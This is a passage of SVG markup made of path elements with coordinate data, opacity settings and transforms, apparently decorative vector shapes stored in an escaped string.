d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path 